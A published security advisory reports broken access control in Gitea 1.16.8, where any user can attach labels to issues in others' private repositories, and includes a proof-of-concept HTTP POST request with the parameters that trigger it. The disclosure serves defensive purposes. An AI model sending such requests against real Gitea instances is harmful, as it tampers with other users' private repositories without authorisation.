usd-2022-0026 | Broken Access Control in Gitea Issue Labels

Advisory ID: usd-2022-0026
Product: Gitea
Affected Version: 1.16.8
Vulnerability Type: https://cwe.mitre.org/data/definitions/284.html
Security Risk: Medium
Vendor URL: https://gitea.io/
Vendor Status: Fixed
Advisory Status: Closed
CVE number: Not requested yet
CVE Link: Not requested yet
First Published: Not published yet
Last Update: 2022-06-30

Introduction

Gitea allows users to add labels to issues. Due to improper access control, it is possible for any user to add labels to any issue.

Proof of Concept

Issue labels can be attached to issues that you should not be able to access.
The issue_id 7 in the example below is an issue of a private repository of another user.

The 4091 is the label id. The label must be exist in the target repository.

POST /testuser/test222/issues/labels HTTP/1.1
Host: localhost:3000
Content-Length: 94
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept:*\*/\**
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: [http://localhost:3000]()
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XXX
Connection: close


_csrf=rmB[...]&action=attach&issue_ids=7&id=4091

Fix

It is recommended to restrict access to sensitive functions or information by default.
Required access privileges should be granted explicitly by a global access control mechanism.

References

• https://cwe.mitre.org/data/definitions/284.html

Timeline

• 2022-06-22: vulnerability identified by Christian Pöschl
• 2022-06-22: First contact request
• 2022-07-01: Investigation started by vendor
• 2022-07-15: Vendor confirms remediation
• 2024-05-29: This advisory is published

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.